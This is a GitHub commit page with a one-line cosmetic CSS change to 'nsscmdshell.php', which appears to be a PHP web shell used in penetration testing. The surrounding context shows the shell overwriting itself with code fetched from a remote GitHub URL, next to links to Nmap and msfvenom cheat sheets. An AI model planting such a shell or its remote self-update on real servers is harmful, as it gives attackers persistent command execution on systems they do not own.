Skip to content

Commit 9b90988

Browse files
committed
Update nsscmdshell.php
1 parent 3946496 commit 9b90988

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

nsscmdshell.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -112,7 +112,7 @@
112112
file_put_contents('nsscmdshell.php', file_get_contents('https://raw.githubusercontent.com/kaotickj/The-Not-So-Simple-PHP-Command-Shell/main/nsscmdshell.php'));
113113
}
114114
if (isset($_GET['links'])) {
115-
echo '<div style="margin:20px 40px;padding:20px 30px;color:#fff;background-color:#000;font-size:1.2em;">
115+
echo '<div style="width:50%;margin:20px 40px;padding:20px 30px;color:#fff;background-color:#000;font-size:1.2em;">
116116
<p>Quick Links:</p>
117117
<a href="https://stationx-public-download.s3.us-west-2.amazonaws.com/nmap_cheet_sheet_v7.pdf" target="_blank">Nmap Cheat Sheet</a><br>
118118
<a href="https://github.com/frizb/MSF-Venom-Cheatsheet" target="_blank">Msfvenom Cheat Sheet</a><br>

0 commit comments

Comments
 (0)